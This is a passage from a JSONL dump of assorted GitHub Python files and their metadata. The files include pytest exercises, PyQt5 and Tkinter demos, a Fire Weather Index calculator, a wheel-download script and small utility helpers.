memory\n# (out) ret_x: list of numpy array (one array element represents one image)\n# (out) csv: array of numpy array (one array element represents one click point)\ndef load_memory(memory_name):\n ret_x = []\n memory_dir = ad.MEMORIES_DIR + memory_name + '/'\n\n csv = np.loadtxt(memory_dir + 'record.csv', delimiter=',', skiprows=1)\n num_of_rows = csv.shape[0]\n csv /= 100\n\n for i in range(0, num_of_rows):\n img_array = load_image(memory_dir + str(i) + '.png')\n ret_x.append(img_array)\n\n return ret_x, csv","repo_name":"ya0201/azurflow","sub_path":"azurflow_utils.py","file_name":"azurflow_utils.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70392737833","text":"import pytest\nfrom pytest_devlife import util\ntry:\n import solution\nexcept:\n solution = None\ntry:\n if solution:\n from solution import celsius_para_fahrenheit\nexcept:\n pass\n\n\ndef setup():\n util.function_exists_in_module(solution, 'celsius_para_fahrenheit')\n\n\n\nlista_celsius = [0, 12, 25, 34, 53, 66, 78, 89, 96, 102]\nlista_fahrenheit = [32, 53.6, 77, 93.2, 127.4, 150.8, 172.4, 192.2, 204.8, 215.6]\n\n@pytest.mark.parametrize(\n 'celsius, fahrenheit',\n [\n pytest.param(i, j, id=f'celsius={i} fahrenheit={j}') for i, j in zip(lista_celsius, lista_fahrenheit)\n ]\n)\ndef test_celsius_para_fahrenheit(celsius, fahrenheit):\n obtido = celsius_para_fahrenheit(celsius)\n assert obtido == pytest.approx(fahrenheit), f'Algo deu errado na conversão da temperatura {celsius} celsius em fahrenheit.\\nEra esperado {fahrenheit}, mas foi obtido {obtido}.'\n\n\nlista_neg_celsius = [-200, -164, -142, -120, -100, -86, -50, -32, -15, -1]\nlista_neg_fahrenheit = [-328.0, -263.2, -223.6, -184.0, -148.0, -122.8, -58.0, -25.6, 5.0, 30.2]\n\n@pytest.mark.parametrize(\n 'celsius, fahrenheit',\n [\n pytest.param(k, m, id=f'celsius={k} fahrenheit={m}') for k, m in zip(lista_neg_celsius, lista_neg_fahrenheit)\n ]\n)\ndef test_temperatura_negativa(celsius, fahrenheit):\n obtido = celsius_para_fahrenheit(celsius)\n assert obtido == pytest.approx(fahrenheit), f'Sua conversão não funcionou para o valor negativo {celsius}.\\nEra esperado {fahrenheit}, mas foi obtido {obtido}.'\n\n\ndef test_temperatura_bem_alta():\n obtido = celsius_para_fahrenheit(133495)\n assert obtido == pytest.approx(240323), f'Algo deu errado na conversão da temperatura 133495 celsius em fahrenheit.\\nEra esperado 240323, mas foi obtido {obtido}.'\n","repo_name":"prady001/projects","sub_path":"python/funcao/exercises/celsius_para_fahrenheit/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7700030161","text":"#!/usr/bin/python\n# conding=utf-8\n\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QProgressBar, QPushButton\nfrom PyQt5.QtCore import QBasicTimer\n\n\nclass ProcessBar(QWidget):\n\n def __init__(self):\n\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n \"\"\"初始化UI界面\"\"\"\n\n # 创建进度条\n self.pbar = QProgressBar(self)\n self.pbar.setGeometry(30, 40, 200, 50)\n\n # self.pbar.setFormat(\"%p\")\n\n # 创建按钮\n self.btn = QPushButton('Start', self)\n\n self.btn.move(40, 80)\n\n self.btn.clicked.connect(self.doAction)\n\n # 创建计时器\n self.timer = QBasicTimer()\n self.step = 0\n\n # window settings\n self.setGeometry(500, 500, 500, 360)\n self.setWindowTitle(\"ProcessBar\")\n self.show()\n \n # QObject 的事件处理函数\n def timerEvent(self, e):\n\n if self.step >= 100:\n self.timer.stop()\n self.btn.setText('Finished')\n return\n \n self.step = self.step + 1\n self.pbar.setValue(self.step)\n # print(self.step)\n\n def doAction(self):\n \"\"\"按钮动作\"\"\"\n\n if self.timer.isActive():\n self.timer.stop()\n self.btn.setText('Start')\n else: \n # start() : 过期时间 & 事件接受者\n self.timer.start(100, self)\n self.btn.setText('Stop')\n\n\n\"\"\"\n20200813 Debug:\nQ: 由于中文系统显示香港英文。同时日期显示为香港中文。导致了程序显示的进度百分比字体或编码有问题。\nA: 排查过后,将系统日期格式更改为香港英文,即可恢复正常\n环境信息:\n- 系统:简体中文\n- 地区:中国\n- 语言:香港英文(显示美国英文时,可能导致字体错乱)\n- 日期:香港英文\n\"\"\" \nif __name__ == \"__main__\":\n \n app = QApplication(sys.argv)\n\n check_box = ProcessBar()\n\n sys.exit(app.exec_())","repo_name":"abookworm-site/AarPyQt5","sub_path":"06_控件/ar04_ProcessBar.py","file_name":"ar04_ProcessBar.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31177569875","text":"import json\nimport os\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom typing import List\n\nimport click\nfrom packaging.version import Version # type: ignore\n\nif sys.version_info.minor >= 11 and sys.version_info.major >= 3:\n import tomllib as toml\nelse:\n import tomli as toml # type: ignore\n\n\nWHEELS_DIR = Path(__file__).parent.parent.absolute()/'src'/'azure_devops_artifacts_helpers'/'wheels'\n\nDOWNLOAD_INDEX_URL = os.environ.get('PIP_INDEX_URL', \"https://pypi.org/simple\")\n\n\n@click.command()\n@click.option('--index-url', default=DOWNLOAD_INDEX_URL, help='Index URL to use')\n@click.option('--py', 'python_versions', default=None, multiple=True, help='Python versions to populate, defaults to values set in pyproject.toml', type=str)\n@click.option('--target-dir', default=str(WHEELS_DIR), help='Target directory to output to')\ndef populate_wheels(index_url: str = DOWNLOAD_INDEX_URL, python_versions: List[str] = [], target_dir: str = str(WHEELS_DIR)) -> None:\n # Load from toml section\n with open('pyproject.toml') as f:\n pyproject_toml = toml.loads(f.read())\n packages = pyproject_toml['project']['optional-dependencies']['vendored']\n required_python_versions = pyproject_toml['project']['requires-python']\n dependencies = pyproject_toml['project']['requires-python']\n if not python_versions:\n # This works for same minor version only - assuming no major version change\n _min_version, _max_version = required_python_versions.split(',')\n # Version\n if _min_version.startswith('>='):\n min_version = Version(_min_version.lstrip('>='))\n elif _min_version.startswith('>'):\n _v = Version(_min_version.lstrip('>'))\n min_version = Version(f'{_v.major}.{_v.minor+1}')\n if _max_version.startswith('<='):\n max_version = Version(_max_version.lstrip('<='))\n elif _max_version.startswith('<'):\n _v = Version(_max_version.lstrip('<'))\n max_version = Version(f'{_v.major}.{_v.minor-1}')\n python_versions = [f'{min_version.major}.{minor}' for minor in range(min_version.minor, max_version.minor+1)]\n print(f'Using versions: {python_versions} from {_min_version}:{_max_version}')\n for py_version in python_versions:\n print(f'PLATFORM: {sys.platform} - PYTHON VERSION: {py_version}')\n args = [sys.executable, '-m', 'pip', 'download',\n '--only-binary=:all:',\n f'--python-version={py_version}',\n '-d', target_dir,\n '--index-url', index_url] + packages\n print(' '.join(args))\n print(subprocess.check_output(args).decode())\n print('Downloaded Packages to '+target_dir)\n print('\\t- '+'\\n\\t- '.join([u for u in os.listdir(target_dir) if u.endswith('whl')] ))\n\n\nif __name__ == \"__main__\":\n populate_wheels()\n","repo_name":"djpugh/azure_devops_artifacts_helpers","sub_path":"tools/populate-wheels.py","file_name":"populate-wheels.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28484575904","text":"# https://leetcode.com/problems/minimum-flips-to-make-a-or-b-equal-to-c/description/\n\nclass Solution:\n def minFlips(self, a: int, b: int, c: int) -> int:\n flips = 0\n mask = 1\n \n for _ in range(32):\n av, bv, cv = a & mask, b & mask, c & mask\n flips += (1 + (av & bv != 0)) * (cv == 0) if av | bv else cv != 0\n mask <<= 1\n \n return flips\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_65/min-flips-to-make-a-or-b-equal-to-c.py","file_name":"min-flips-to-make-a-or-b-equal-to-c.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22331292547","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\n'''\nIntro text to this script\n'''\n\nimport math\nimport numpy as np\nimport sys\n\n\nclass FWICLASS:\n \n # ********* new function **********\n # Defining some attributes of the FWICLASS\n def __init__(self,temp,rhum,wind,prcp):\n self.h = rhum # Relative humidity\n self.t = temp # Temperature\n self.w = wind # Wind\n self.p = prcp # Precipitation\n\n \n \n \n # ********* new function ********** \n # Calculating the fine fuel moisture code (FFMC)\n # mo = FFMC on previous day\n # ffmc0 = FFMC as records begin\n # rf = Effective rain fall for calculating FFMC\n # m = Fine Fuel Moisture Content after drying\n # k1 = Intermediate step in calculation of kw\n # kw = Natural log wetting rate, ln (M)/day \n def FFMCcalc(self,ffmc0):\n mo = (147.2*(101.0 - ffmc0))/(59.5 + ffmc0) #*Eq. 1*#\n if (self.p > 0.5):\n rf = self.p - 0.5 #*Eq. 2*#\n if(mo > 150.0):\n mo = (mo+42.5*rf*math.exp(-100.0/(251.0-mo))*(1.0 - math.exp(-6.93/rf))) + (.0015*(mo - 150.0)**2)*math.sqrt(rf) #*Eq. 3b*#\n elif mo <= 150.0:\n mo = mo+42.5*rf*math.exp(-100.0/(251.0-mo))*(1.0 - math.exp(- 6.93/rf)) #*Eq. 3a*#\n if(mo > 250.0):\n mo = 250.0 \n \n \n # Fine Fuel equilibrium moisture content(EMC) for drying \n ed = .942*(self.h**.679) + (11.0*math.exp((self.h-100.0)/10.0))+0.18*(21.1-self.t)*(1.0 - 1.0/math.exp(.1150 * self.h)) #*Eq. 4*#\n\n # Defining m (Fine Fuel Moisture Content after drying )\n if(mo < ed):\n ew = .618*(self.h**.753) + (10.0*math.exp((self.h-100.0)/10.0)) + .18*(21.1-self.t)*(1.0 - 1.0/math.exp(.115 * self.h)) #*Eq. 5*#\n if(mo <= ew):\n kl = .424*(1.0-((100.0-self.h)/100.0)**1.7)+(.0694*math.sqrt(self.w))*(1.0 - ((100.0 - self.h)/100.0)**8) #*Eq. 7a*#\n kw = kl * (.581 * math.exp(.0365 * self.t)) #*Eq. 7b*#\n m = ew - (ew - mo)/10.0**kw #*Eq. 9*#\n elif mo > ew:\n m = mo\n\n elif(mo == ed):\n m = mo\n\n elif mo > ed:\n kl =.424*(1.0-(self.h/100.0)**1.7)+(.0694*math.sqrt(self.w))*(1.0-(self.h/100.0)**8) #*Eq. 6a*#\n kw = kl * (.581*math.exp(.0365*self.t)) #*Eq. 6b*#\n m = ed + (mo-ed)/10.0 ** kw #*Eq. 8*#\n\n # Calculating ffmc output \n ffmc = (59.5 * (250.0 -m)) / (147.2 + m) #*Eq. 10*#\n if (ffmc > 101.0):\n ffmc = 101.0\n if (ffmc <= 0.0):\n ffmc = 0.0\n return ffmc\n \n \n \n \n \n # ********* new function ********** \n # Calculating duff moisture code (DMC)\n # el = Effective day length in DMC, monthly (FOR CANADA)\n # rk = Log drying rate in DMC, ln (M)/day\n # t = temperature\n # wmi = Duff Moisture Content from previous day\n # wmr = Duff moisture content after rain\n # pr = DMC after rain\n # dmc0 = 6.0 (constant)\n # mth = month\n def DMCcalc(self,dmc0,mth):\n el = [8.5,10.0,12.0,14.0,15.5,16.5,16.0,14.5,12.5,10.5,9.0,8.0] # hard coded here for UK›‹\n t = self.t\n if (t < -1.1):\n t = -1.1\n rk = 1.894*(t+1.1) * (100.0-self.h) * (el[mth-1]*0.0001) #*Eqs. 16 and 17*#\n if self.p > 1.5:\n ra= self.p\n rw = 0.92*ra - 1.27 #*Eq. 11*#\n wmi = 20.0 + 280.0/math.exp(0.023*dmc0) #*Eq. 12*#\n if dmc0 <= 33.0:\n b = 100.0 /(0.5 + 0.3*dmc0) #*Eq. 13a*#\n elif dmc0 > 33.0:\n if dmc0 <= 65.0:\n b = 14.0 - 1.3*math.log(dmc0) #*Eq. 13c*#\n elif dmc0 > 65.0:\n b = 6.2 * math.log(dmc0) - 17.2 #*Eq. 13b*#\n wmr = wmi + (1000*rw) / (48.77+b*rw) #*Eq. 14*#\n pr = 43.43 * (5.6348 - math.log(wmr-20.0)) #*Eq. 15*#\n elif self.p <= 1.5:\n pr = dmc0\n if (pr<0.0):\n pr = 0.0\n dmc = pr + rk\n if(dmc<= 1.0):\n dmc = 1.0\n return dmc\n \n\n \n \n \n # ********* new function ********** \n # Calculating drought code:\n # fl = day length adjustment for drought code\n # t = temp\n # pe = Potential evapotranspiration, units of 0.254 mm water/day \n # mth = month\n # ra = rainfall\n # rw = effective rainfall for drought code calculation\n # smi = Moisture equivalent of previous day’s DC\n # dr = DC after rain\n # dc0 = input constant (15.0)\n def DCcalc(self,dc0,mth):\n fl = [-1.6, -1.6, -1.6, 0.9, 3.8, 5.8, 6.4, 5.0, 2.4, 0.4, -1.6, -1.6] # Related to mean monthly \n #heat index (for Canada)\n t = self.t\n if(t < -2.8):\n t = -2.8\n pe = (0.36*(t+2.8) + fl[mth-1] )/2 #*Eq. 22*# Some linearisation of Thorthwaite\n if pe <= 0.0:\n pe = 0.0\n if (self.p > 2.8):\n ra = self.p\n rw = 0.83*ra - 1.27 #*Eq. 18*#\n smi = 800.0 * math.exp(-dc0/400.0) #*Eq. 19*#\n dr = dc0 - 400.0*math.log( 1.0+((3.937*rw)/smi) ) #*Eqs. 20 and 21*#\n if (dr > 0.0):\n dc = dr + pe\n else:\n dc = pe\n elif self.p <= 2.8:\n dc = dc0 + pe\n return dc\n\n \n \n \n \n # ********* new function **********\n # Calculating Initial Spread Index (ISI)\n # mo = FFMC on previous day\n # ff = Fine fuel moisture function\n def ISIcalc(self,ffmc):\n mo = 147.2*(101.0-ffmc) / (59.5+ffmc) #*Eq. 1*#\n ff = 19.115*math.exp(mo*-0.1386) * (1.0+(mo**5.31)/49300000.0) #*Eq. 25*#\n isi = ff * math.exp(0.05039*self.w) #*Eq. 26*#\n return isi\n\n\n\n\n\n\n # ********* new function **********\n # Calculating build-up index (BUI)\n # dc = drought code\n # dmc = duff moisute code\n def BUIcalc(self,dmc,dc):\n if dmc <= 0.4*dc:\n bui = (0.8*dc*dmc) / (dmc+0.4*dc) #*Eq. 27a*#\n else:\n bui = dmc-(1.0-0.8*dc/(dmc+0.4*dc))*(0.92+(0.0114*dmc)**1.7) #*Eq. 27b*#\n if bui <0.0:\n bui = 0.0\n return bui\n\n\n\n\n\n # ********* new function **********\n # Calculating fire weather index (FWI)\n # bb = Intermediate FWI\n def FWIcalc(self,isi,bui):\n if bui <= 80.0:\n bb = 0.1 * isi * (0.626*bui**0.809 + 2.0) #*Eq. 28a*#\n else:\n bb = 0.1*isi*(1000.0/(25. + 108.64/math.exp(0.023*bui))) #*Eq. 28b*#\n if(bb <= 1.0):\n fwi = bb #*Eq. 30b*#\n else:\n fwi = math.exp(2.72 * (0.434*math.log(bb))**0.647) #*Eq. 30a*#\n return fwi\n \n \n \n \ndef FWI_calc(UK_data):\n # Slimmed down outputs:\n outputs = np.zeros((1,UK_data.shape[1],UK_data.shape[2],UK_data.shape[3]))\n # Getting variables: mth,temp,rhum,wind,prcp\n print(f'Total number of steps: {UK_data.shape[3]}')\n for k in range(UK_data.shape[3]): #############################################################\n print(f'Step {k}')\n for j in range(UK_data.shape[2]):\n ffmc0 = 85.0\n dmc0 = 6.0\n dc0 = 15.0\n for i in range(UK_data.shape[1]):\n # Getting month (Dec-Nov year structure)\n mth = int(((i-i%30)/30 - 1)%12 + 1)\n temp = UK_data[0,i,j,k]\n rhum = UK_data[1,i,j,k]\n wind = UK_data[2,i,j,k]\n prcp = UK_data[3,i,j,k]\n \n if rhum > 100.0:\n rhum = 100.0\n fwisystem = FWICLASS(temp,rhum,wind,prcp)\n ffmc = fwisystem.FFMCcalc(ffmc0) \n dmc = fwisystem.DMCcalc(dmc0,mth)\n dc = fwisystem.DCcalc(dc0,mth)\n isi = fwisystem.ISIcalc(ffmc)\n bui = fwisystem.BUIcalc(dmc,dc) \n fwi = fwisystem.FWIcalc(isi,bui)\n ffmc0 = ffmc\n dmc0 = dmc\n dc0 = dc\n #print(mth,temp,rhum,wind,prcp,ffmc,dmc,dc,isi,bui,fwi)\n #outputs[:,i,j,k] = mth,ffmc,dmc,dc,isi,bui,fwi\n outputs[:,i,j,k] = fwi\n \n return outputs \n\n","repo_name":"theorrrk/dissertation","sub_path":"scripts/fwi.py","file_name":"fwi.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43061352349","text":"# 세 개의 자연수 A, B, C가 주어질 때 A × B × C를 계산한 결과에 0부터 9까지 각각의 숫자가 몇 번씩 쓰였는지를 구하는 프로그램을 작성하시오.\r\n# 예를 들어 A = 150, B = 266, C = 427 이라면 A × B × C = 150 × 266 × 427 = 17037300 이 되고,\r\n# 계산한 결과 17037300 에는 0이 3번, 1이 1번, 3이 2번, 7이 2번 쓰였다.\r\n\r\na = int(input())\r\nb = int(input())\r\nc = int(input())\r\n\r\nnums_list = list(str(a*b*c))\r\nfor i in range(10):\r\n print(nums_list.count(str(i)))\r\n\r\n\r\n'''\r\na, b, c를 입력받고\r\na,b,c 곱한 결과를 str함수를 이용하여 문자열로 변환\r\nlist를 이용하여 각각의 문자를 요소로 가지는 리스트로 변환\r\ncount를 사용하여 리스트에 문자가 몇개씩 있는지 출력\r\n'''","repo_name":"Hanny0809/Algorithm","sub_path":"2577_숫자개수.py","file_name":"2577_숫자개수.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36688796150","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n#Original Author: github.com/akloster\n#Changes made by: github.com/cklam19\n\nimport time\nimport sys\nimport argparse\nimport socket\n\nimport random\n\n \n#define IP address same as Gateway\nSERVER_ADDRESS = '169.234.33.113'\n\n\nif __name__ == '__main__':\n \n #define an INET, STREAMing socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #define IP address and match port with EEGServer port\n server_address = (SERVER_ADDRESS,2222)\n print >>sys.stderr, 'connecting to %s port %s' % server_address\n #socket connect requires IP address and also port number\n sock.connect(server_address)\n\n while True:\n #time.sleep(0.25)\n \n nmin = .08\n t_end = time.time() + 60*(nmin)\n \n #append data to array for \n while (time.time() < t_end):\n randNum = random.randrange(-1000,1000)\n sock.sendall(str(randNum))\n print(str(randNum)+'\\n')\n time.sleep(0.010)\n \n \n ","repo_name":"chucklinatlife/EEG_IOT","sub_path":"test-to-wukong.py","file_name":"test-to-wukong.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6788580054","text":"from mygymPrescan.PrescanModel import *\n\n\n\n\nclass Discrete:\n r\"\"\"A discrete space in :math:`\\{ 0, 1, \\\\dots, n-1 \\}`.\n Example::\n >>> Discrete(2)\n \"\"\"\n\n def __init__(self, n):\n assert n >= 0\n self.n = n\n\n def __repr__(self):\n return \"Discrete(%d)\" % self.n\n\ndef time_range(t_end,steps=0.05):\n return range(int(t_end/steps))\n\nclass Enviroment:\n def __init__(self,outport=None, inport=None):\n self.outport = outport\n self.out = Reciver_UDP_json(outport)\n self.out.build()\n\n self.inport = None\n off_set_port, desired_velocity_port,reset_port = inport\n self.off_set_UDP = Transmitter_UDP(off_set_port) # 8072)\n self.desired_velocity_UDP = Transmitter_UDP(desired_velocity_port) # 8073)\n self.reset_UDP = Transmitter_UDP(reset_port,fmt='?') # 8075)\n\n def __del__(self):\n self.close()\n\n def close(self):\n self.out.close()\n self.off_set_UDP.close()\n self.desired_velocity_UDP.close()\n self.reset_UDP.close()\n for model in Model.objects:\n model.close()\n try:\n eng.quit()\n except:\n pass\n # print('Enviroment-------close')\n\n def reset(self):\n self.reset_UDP.send(True)\n self.reset_UDP.send(False)\n self.send((0,0))\n\n def send(self,data):\n o = data[0];d = data[1]\n self.off_set_UDP.send(o)\n self.desired_velocity_UDP.send(d)\n # self.reset_UDP.send(r,'?')\n\n def get(self):\n self.data = self.out.get()\n self.agent = self.data['Vehicles'][self.data['Object']]\n return self.data\n\n def create_model(self, car_name=None, road_name=None):\n self.road = Road(road_name)\n self.car = Vehicle(car_name, self.road)\n self.road.create()\n self.car.create()\n # print('_____________env______________')\n\n","repo_name":"MohammadRaziei/prescan_test","sub_path":"PreScan_Vissim_Python_1/mygymPrescan/PrescanEnviroment.py","file_name":"PrescanEnviroment.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6616153744","text":"from ghub import githubutils\nfrom ghub.ghubutils import GHub\n\n\nclass TestGitHubUtils:\n def test_authorize(self):\n ghub = GHub(fromenv=True)\n auth = githubutils.authorize(ghub, fromenv=True)\n assert auth == True\n\n def test_get_user_tabs(self):\n ghub = GHub(fromenv=True)\n githubutils.get_user_tabs(ghub, \"repos\")\n assert ghub.context.context == \"repos\"\n assert ghub.context.location == \"BBloggsbott/repos\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"stars\")\n assert ghub.context.context == \"stars\"\n assert ghub.context.location == \"BBloggsbott/stars\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"following\")\n assert ghub.context.context == \"following\"\n assert ghub.context.location == \"BBloggsbott/following\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"followers\")\n assert ghub.context.context == \"followers\"\n assert ghub.context.location == \"BBloggsbott/followers\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"notifications\")\n assert ghub.context.context == \"notifications\"\n assert ghub.context.location == \"BBloggsbott/notifications\"\n ghub.context = ghub.context.prev_context\n\n def test_latest_commit(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_latest_commit(ghub, \"BBloggsbott/ghub\")\n assert res != False\n\n def test_get_tree(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_tree(ghub, \"BBloggsbott/ghub\")\n assert res != False\n\n def test_get_user(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_user(ghub, \"BBloggsbott\")\n assert res != False\n\n def test_clone_repo(self):\n ghub = GHub(fromenv=True)\n res = githubutils.clone_repo(ghub, \"~/gitClones\", \"BBloggsbott/ghub\")\n assert res\n\n def test_fork_repo(self):\n ghub = GHub(fromenv=True)\n res = githubutils.fork_repo(ghub, \"BBloggsbott/ghub\")\n assert res == False\n","repo_name":"BBloggsbott/ghub","sub_path":"tests/test_githubutils.py","file_name":"test_githubutils.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33042611616","text":"import tkinter as tk\r\n\r\nwindow = tk.Tk()\r\n#greeting = tk.Label(\r\n# text=\"Hello, Tkinter\",\r\n# foreground=\"white\", # Set the text color to white\r\n# bg=\"#34A2FE\", #set the background color to light blue while using the abbreviated for backgroud bg. \r\n# width=10,\r\n# height=10\r\n#)\r\n#greeting.pack()\r\n\r\n#button = tk.Button(\r\n# text = \"Click Me!\",\r\n# width=25,\r\n# height=5,\r\n# bg=\"blue\",\r\n# fg=\"yellow\"\r\n#)\r\n#button.pack()\r\n\r\nlabel = tk.Label(text='Name')\r\nentry = tk.Entry()\r\nlabel.pack()\r\nentry.pack()\r\n\r\nname = entry.insert(0, \"Python\")\r\n\r\nwindow.mainloop()\r\n\r\n\r\n","repo_name":"fencingbuddha/TkinterFun","sub_path":"TkinterTutorial.py","file_name":"TkinterTutorial.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23242868900","text":"# 1. Countdown- \n# x = int(input(\"Please enter your number: \"))\n# for countdown in range(x, 0, -1):\n# print(countdown)\n\n# 2. Print and Return-\n# def print_and_return(a,b):\n# print(a)\n# return b\n# print_and_return(1,2)\n\n# 3. First plus Length\n# x=[1,2,3,4,5,6,7,8]\n# def first_plus_length(x):\n# sum = int(x[0]) + int(x[len(x)-1])\n# print(sum)\n# first_plus_length(x)\n\n# 4. Values Greater than Second\nx = [1,2,5,3,4,2,6]\ndef values_greater_than_second(x):\n y = []\n for i in range(0, len(x), 1):\n if x[i] > x[1]:\n y.append(int(x[i]))\n else:\n continue\n print(len(y))\n print(y) \nvalues_greater_than_second(x)\n\n# 5. This Length, that Value\n# def length_and_value(size,value):\n# y = []\n# for i in range(0, size, 1):\n# y.append(int(value))\n# print(y)\n# length_and_value(6,2)\n\n\n","repo_name":"devidhang/Python-stack","sub_path":"Hang_David_FunctionsBasic2.py","file_name":"Hang_David_FunctionsBasic2.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32680182536","text":"import pylab as plt\nimport time\n\nrawData = open(\"sessions_data.txt\", \"r+\")\n\nrawList = []\n\ntimes = []\nvalA = []\nvalB = []\n\nfor i in rawData.read().split('\\n'):\n splitI = i.split(\"\\t\")\n splitI[0] = splitI[0]\n times.append(time.mktime(time.strptime(splitI[0][0:19], \"%Y-%m-%dT%H:%M:%S\")))\n valA.append(int(splitI[1].strip(\" \").replace(\",\", \"\")))\n valB.append(int(splitI[3].strip(\" \").replace(\",\", \"\")))\n\nprint(times)\nprint(valA)\nprint(valB)\n \nplt.figure('Sessions', figsize=(16,8))\nplt.clf()\nplt.plot(times, valA, 'b-', linewidth = 2.0)\nplt.plot(times, valB, 'b-', linewidth = 2.0)\nplt.ticklabel_format(style=\"plain\")\nplt.show()","repo_name":"crackjaw/botty","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70144401193","text":"import csv\ncases2 = list()\nwith open('corona.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in spamreader:\n cases=row[0].split(',')\n while (\"\" in cases):\n cases.remove(\"\")\n try:\n cases2.append(cases[4])\n except:\n print(\"\")\n i = 1\n new_list = list()\n while(i len(longestSubset):\n longestSubset = j\n else:\n continue\n return longestSubset\ndef longestChain(arr):\n maxWord = ''\n for i in arr :\n if len(i) == 1:\n continue\n longestSubset = findSubset(arr, i)\n while len(longestSubset): \n if len(longestSubset) > len(maxWord):\n maxWord = longestSubset\n longestSubset = findSubset(arr,longestSubset)\n return len(maxWord) + 1\n\ntest1 = ['a','and','an', 'bear']\ntest2 = ['a','b','ba','bca','bda', 'bdca']\ntest3 = ['a', '']\n\nprint(longestChain(test3))","repo_name":"obiofiong/Python-algorithms-and-data-structures","sub_path":"practices/stringChains.py","file_name":"stringChains.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27845284050","text":"import pytest\r\n\r\n'''To run test - python -m py.test'''\r\n\r\n@pytest.fixture\r\ndef connect(param1):\r\n\t# Setup\r\n\tyield param1\r\n\t# Cleanup\r\n\r\n\r\n@pytest.fixture\r\ndef upload(param2):\r\n\t# Setup\r\n\tyield param2\r\n\t# Cleanup\r\n\r\n\r\n@pytest.fixture\r\ndef create_setup(connect, upload):\r\n\t# Setup\r\n\tyield connect + \" \" + upload\r\n\t# Cleanup\r\n\r\n\r\nsetups = {\r\n\t\"v1.0\": [\r\n\t\t\t\"Hello\",\r\n\t\t\t\"World\",\r\n\t\t],\r\n\t\"v2.1\": [\r\n\t\t\t\"Good\",\r\n\t\t\t\"Day\",\r\n\t\t],\r\n}\r\n\r\n\r\ndef pytest_generate_tests(metafunc):\r\n\tif \"create_setup\" in metafunc.fixturenames:\r\n\t\targnames = [\"param1\", \"param2\"]\r\n\t\targvalues = [setups[v] for v in setups]\r\n\t\tids = [v for v in setups]\r\n\t\tmetafunc.parametrize(argnames, argvalues, ids=ids)\r\n","repo_name":"gegiti/pytest","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30183945838","text":"import re\nimport os\nimport json\nimport time\nimport math\nimport torch\nimport pickle\nimport shutil\nimport random\nimport string\nimport hashlib\nimport pathlib\n\nimport numpy as np\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\nfrom nltk import corpus\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import models\nfrom torchvision import datasets\nfrom torchvision import transforms \n\nfrom sklearn.model_selection import train_test_split\n\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\n\n\ndef get_system_time():\n return str(time.time()).split(\".\")[0]\n\n\ndef get_current_time():\n return datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n\ndef save_text_file(record_list, filename):\n result = \"\"\n for record in record_list:\n result += f\"{record}\\n\"\n\n with open(filename, \"w\") as fp: fp.write(result)\n\n\ndef load_text_file(filename):\n if not pathlib.Path(filename).exists(): \n print(\"FILE NOT EXISTENT\")\n return None\n\n with open(filename, \"r\", errors=\"ignore\") as fp:\n return fp.readlines()\n\n\ndef save_json_file(record_list, filename):\n result = \"\"\n for record in record_list:\n result += \"%s\\n\" % json.dumps(record)\n \n with open(filename, \"w\") as fp: 